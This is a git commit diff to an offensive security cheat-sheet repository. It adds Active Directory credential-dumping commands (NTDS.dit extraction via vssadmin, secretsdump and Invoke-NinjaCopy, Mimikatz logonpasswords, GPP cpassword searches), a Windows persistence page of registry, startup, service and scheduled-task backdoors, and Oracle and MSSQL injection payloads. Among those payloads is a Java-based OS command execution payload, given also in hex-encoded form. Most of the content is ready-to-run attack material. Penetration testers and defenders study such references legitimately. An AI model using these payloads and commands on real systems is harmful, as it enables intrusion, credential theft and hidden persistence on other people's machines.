Oracle SQL + SQL injection updates (MS SQL/MYSQL/ GENERAL)

This commit is contained in:
Swissky 2018-04-27 23:31:58 +02:00
parent 8209d32baf
commit cb3b298451
6 changed files with 220 additions and 9 deletions

View File

@ -18,7 +18,7 @@
``` ```
* Unconstrained Delegation (incl. pass-the-ticket) * Unconstrained Delegation (incl. pass-the-ticket)
* OverPass-the-Hash (Making the most of NTLM password hashes) * OverPass-the-Hash (Making the most of NTLM password hashes)
* Pivoting with Local Admin & Passwords in SYSVOL * GPO - Pivoting with Local Admin & Passwords in SYSVOL
```c ```c
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
@ -27,9 +27,16 @@
Metasploit: scanner/smb/smb_enumshares Metasploit: scanner/smb/smb_enumshares
Metasploit: windows/gather/enumshares Metasploit: windows/gather/enumshares
Metasploit: windows/gather/credentials/gpp Metasploit: windows/gather/credentials/gpp
/!\ GPO Priorization : Organization Unit > Domain > Site > Local
List all GPO for a domain :
Get-GPO -domaine DOMAIN.COM -all
Get-GPOReport -all -reporttype xml --all
``` ```
* Dangerous Built-in Groups Usage * Dangerous Built-in Groups Usage
* Dumping AD Domain Credentials
* Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
```c ```c
C:\>ntdsutil C:\>ntdsutil
ntdsutil: activate instance ntds ntdsutil: activate instance ntds
@ -38,11 +45,22 @@
ifm: quit ifm: quit
ntdsutil: quit ntdsutil: quit
or
vssadmin create shadow /for=C :
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
then you need to use secretsdump to extract the hashes
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
or or
Metasploit : windows/gather/credentials/domain_hashdump Metasploit : windows/gather/credentials/domain_hashdump
or
PowerSploit : Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
``` ```
* Golden Tickets * Golden Tickets
Mimikatz version Mimikatz version
@ -88,13 +106,6 @@
* RottenPotato * RottenPotato
* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
## Mimikatz
```
load mimikatz
mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
```
## PowerSploit ## PowerSploit
``` ```
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon

View File

@ -14,6 +14,9 @@ PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest mimikatz # sekurlsa::wdigest
mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
``` ```
Mimikatz Golden ticket Mimikatz Golden ticket

View File

@ -0,0 +1,58 @@
# Windows - Persistence
## Userland
### Registry
Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.
```
Value name: Backdoor
Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
```
### Startup
Create a batch script in the user startup folder.
```
PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
```
### Scheduled Task
```
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
```
## Elevated
### HKLM
Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.
```
Value name: Backdoor
Value data: C:\Windows\Temp\backdoor.exe
```
### Services
Create a service that will start automatically or on-demand.
```
PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."
```
### Scheduled Tasks
Scheduled Task to run as SYSTEM, everyday at 9am.
```
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
```
## Thanks to
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)

View File

@ -20,6 +20,8 @@ SELECT DB_NAME(N); — for N = 0, 1, 2, …
``` ```
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = mytable); — for the current DB only SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = mytable); — for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=sometable; — list colum names and types for master..sometable SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=sometable; — list colum names and types for master..sometable
SELECT table_catalog, column_name FROM information_schema.columns
``` ```
## MSSQL List Tables ## MSSQL List Tables
@ -27,6 +29,8 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master.
SELECT name FROM master..sysobjects WHERE xtype = U; — use xtype = V for views SELECT name FROM master..sysobjects WHERE xtype = U; — use xtype = V for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = U; SELECT name FROM someotherdb..sysobjects WHERE xtype = U;
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=sometable; — list colum names and types for master..sometable SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=sometable; — list colum names and types for master..sometable
SELECT table_catalog, table_name FROM information_schema.columns
``` ```
@ -44,7 +48,19 @@ SELECT name + - + master.sys.fn_varbintohexstr(password_hash) from master.
## MSSQL Error based ## MSSQL Error based
``` ```
For integer inputs : convert(int,@@version) For integer inputs : convert(int,@@version)
For integer inputs : cast((SELECT @@version) as int)
For string inputs : ' + convert(int,@@version) + ' For string inputs : ' + convert(int,@@version) + '
For string inputs : ' + cast((SELECT @@version) as int) + '
```
## MSSQL Blind based
```
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
SELECT message FROM data WHERE row = 1 and message like 't%'
``` ```
## MSSQL Time based ## MSSQL Time based

View File

@ -0,0 +1,85 @@
# Oracle SQL Injection
## Oracle SQL version
```
SELECT user FROM dual UNION SELECT * FROM v$version
```
## Oracle SQL database name
```
SELECT global_name FROM global_name;
SELECT name FROM V$DATABASE;
SELECT instance_name FROM V$INSTANCE;
SELECT SYS.DATABASE_NAME FROM DUAL;
```
## Oracle SQL List Databases
```
SELECT DISTINCT owner FROM all_tables;
```
## Oracle SQL List Column
```
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
```
## Oracle SQL List Tables
```
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
```
## Oracle SQL Error based
| Description | Query |
| :------------- | :------------- |
| Invalid HTTP Request | SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual |
| CTXSYS.DRITHSX.SN | SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual |
| Invalid XPath | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual |
| Invalid XML | SELECT to_char(dbms_xmlgen.getxml('select "'&#124;&#124;(select user from sys.dual)&#124;&#124;'" FROM sys.dual')) FROM dual |
| Invalid XML | SELECT rtrim(extract(xmlagg(xmlelement("s", username &#124;&#124; ',')),'/s').getstringval(),',') FROM all_users |
## Oracle SQL Blind
| Description | Query |
| :------------- | :------------- |
| Version is 12.2 | SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%'; |
| Subselect is enabled | SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual) |
| Table log_table exists | SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table); |
| Column message exists in table log_table | SELEC COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; |
| First letter of first message is t | SELEC message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |
## Oracle SQL Command execution
```
/* create Java class */
BEGIN
EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';
END;
/
BEGIN
EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';';
END;
/
/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
```
or (hex encoded)
```
/* create Java class */
SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d''));
EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual
/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
```
## Thanks to
* [Heavily taken inspired by - NetSpi SQL Wiki ](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)

View File

@ -34,6 +34,14 @@ Merging characters
'%2B'HERP '%2B'HERP
``` ```
Logic Testing
```
page.asp?id=1 or 1=1 -- true
page.asp?id=1' or 1=1 -- true
page.asp?id=1" or 1=1 -- true
page.asp?id=1 and 1=2 -- false
```
Weird characters Weird characters
``` ```
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
@ -42,6 +50,35 @@ Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
transformed into U+0027 APOSTROPHE (') transformed into U+0027 APOSTROPHE (')
``` ```
## DBMS Identification
```
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],
["connection_id()=connection_id()" ,"MYSQL"],
["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"],
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"],
["@@CONNECTIONS>0" ,"MSSQL"],
["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"],
["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"],
["USER_ID(1)=USER_ID(1)" ,"MSSQL"],
["ROWNUM=ROWNUM" ,"ORACLE"],
["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"],
["LNNVL(0=123)" ,"ORACLE"],
["5::int=5" ,"POSTGRESQL"],
["5::integer=5" ,"POSTGRESQL"],
["pg_client_encoding()=pg_client_encoding()" ,"POSTGRESQL"],
["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"],
["quote_literal(42.5)=quote_literal(42.5)" ,"POSTGRESQL"],
["current_database()=current_database()" ,"POSTGRESQL"],
["sqlite_version()=sqlite_version()" ,"SQLITE"],
["last_insert_rowid()>1" ,"SQLITE"],
["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"],
["val(cvar(1))=1" ,"MSACCESS"],
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"],
["cdbl(1)=cdbl(1)" ,"MSACCESS"],
["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
```
## SQL injection using SQLmap ## SQL injection using SQLmap
Basic arguments for SQLmap Basic arguments for SQLmap
@ -349,6 +386,7 @@ mysql> mysql> select version();
## Thanks to - Other resources ## Thanks to - Other resources
* Detect SQLi * Detect SQLi
- [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/) - [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
- [NetSPI SQL Injection Wiki](https://sqlwiki.netspi.com/)
* MySQL: * MySQL:
- [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet) - [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/) - [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)